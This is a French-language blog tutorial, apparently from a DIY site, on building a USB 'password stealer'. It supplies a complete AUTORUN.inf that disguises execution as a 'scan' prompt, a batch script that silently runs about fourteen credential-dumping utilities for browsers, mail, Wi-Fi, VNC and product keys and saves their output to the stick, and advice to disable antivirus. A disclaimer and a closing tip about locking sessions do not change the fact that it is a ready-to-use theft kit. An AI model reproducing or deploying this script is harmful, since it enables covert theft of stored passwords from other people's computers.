Aspirateur de mots de passe ou USB Password Stealer

Bonjour à tous, aujourd'hui je vais vous parler des aspirateurs de mots de passe, également connus sous le nom de "USB Password Stealer" (traduisez "Voleur de mots de passe USB"). Pour vous familiariser avec le concept, voici une vidéo de démonstration :

Il s'est passé quoi là exactement ?

Eh bien c'est très simple : on branche une clé USB à un ordinateur allumé et cette dernière récupère (presque) tous les mots de passes enregistrés sur l'ordinateur.

Cela peut s'avérer bien pratique lorsque vous vous apprêtez à formater votre ordinateurs et que vous voulez récupérer vos mots de passe Firefox, Thunderbird et autres sans y passer une après midi complète.

Ce tutoriel est écrit dans un but ludique. Sachez qu'il est illégal d'effectuer ce genre de manip' sur un ordinateur qui ne vous appartient pas, il s'agit ni plus ni moins de vol. Fire-DIY décline toute responsabilité quant à l'utilisation de ce tutoriel par des personnes mal avisées et vous rappelle que vous êtes responsables de vos actes.

Concrètement, la clé USB embarque une dizaine de petits programmes tous spécialisés dans la capture de mots de passe, chacun pour une application particulière. Par exemple pour msn (qui utilise encore ça ? ^^), Chrome, Internet Explorer ...etc. Vous l'aurez compris, c'est très simple d'utilisation mais très puissants (et potentiellement dangereux si on ne verrouille pas sa session...).

Allez, place à la pratique !

1. Autorun

La première étape consiste à créer un fichier autorun qui va permettre d'automatiser le lancement des programmes dont je vous ai parlé lors de l'insertion du périphérique de stockage, en l'occurrence notre clé USB. A travers ce fichier, nous allons demander à Windows d'exécuter un batch (que nous écrirons à l'étape 2) qui s'occupera de lancer tous les programmes de capture de mot de passe. Ceci permet de n'avoir qu'à brancher la clé USB pour que tout se déroule tout seul.

Ouvrez donc votre éditeur de texte favoris (Notepad++ ou Sublime Text par exemple) et collez-y le bout de code suivant :

[autorun]
open=launch.bat
ACTION=Passer un scan

Enregistrez ce fichier sur votre clé USB sous le nom de "AUTORUN.inf".

2. Le batch

Cette fois ci, nous allons écrire le batch qui va exécuter un à un les programmes de récupération de mots de passe.

Comme pour l'étape précédente, ouvrez votre éditeur de texte et tapez le code suivant :

 

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt

 

Ce code est vraiment très simple à comprendre, on démarre un programme avec "start" et on enregistre dans un fichier texte ce qu'il nous renvoie grâce à la commande "/stext".

Là encore, enregistrez ce fichier sur votre clé USB et nommez-le "launch.bat".

3. Téléchargement des programmes

Maintenant, il faut télécharger les programmes appelés par notre batch (eh oui, sinon rien ne va se lancer).

Voici les liens de téléchargement des différents programmes cités plus hauts :

Ils se présentent sous la forme d'archives ZIP. Décompressez-les et déplacez les exécutables (.exe) à la racine de votre clé USB (là où il y a déjà AUTORUN.inf et launch.bat).

Screenshot du contenu de la clé USB

Votre clé USB est maintenant prête pour utilisation.

 

4. Effectuer un test

Maintenant que notre clé USB est fin prête, nous allons effectuer un petit test pour vérifier que tout fonctionne correctement.

Retirez votre clé en toute sécurité puis rebranchez-là. Si tout se passe bien, une fenêtre d'alerte affichant "Passer un scan" apparaît. Cliquez simplement sur OK pour lancer l'aspirateur de mots de passe. Maintenant rendez-vous sur votre clé. Vous pouvez voir que des fichiers texte sont apparu. Ce sont ces fichiers textes qui contiennent les mots de passe capturés par chaque programme.

Exemple d'une capture de mot de passe

Vous n'avez plus qu'à retirer votre clé en toute sécurité pour ne pas perdre les mots de passe sauvegardés.

Je n'ai aucune fenêtre qui s'ouvre lorsque je branche ma clé, comment ça se fait ?

Pas de panique, ça n'est pas ça qui va nous arrêter ! Il arrive en effet que l'autorun soit désactivé pour des raisons de sécurité. Dans ce cas, il vous suffit de vous rendre sur la clé et de double cliquer sur "launch.bat" pour le lancer, c'est tout !

Pensez à désactiver votre antivirus (temporairement bien sûr) si vous ne voulez pas avoir une pop-up d'alerte bloquante qui s'ouvre à chaque exécution d'un programme de capture.

C'est la fin de ce tuto, j'espère qu'il vous aura été utile et que maintenant vous penserez à verrouiller votre session lorsque vous vous absentez.
Pour rappel, le raccourci clavier pour verrouiller Windows est Win + L.

A bientôt sur fire-DIY !

Vos réactions (0) :

  1. Sois le/la premier(e) à commenter cet article !
Les commentaires sont désactivés.
Utilisation des données

Afin d'améliorer ton expérience utilisateur, nous utilisons des cookies 🍪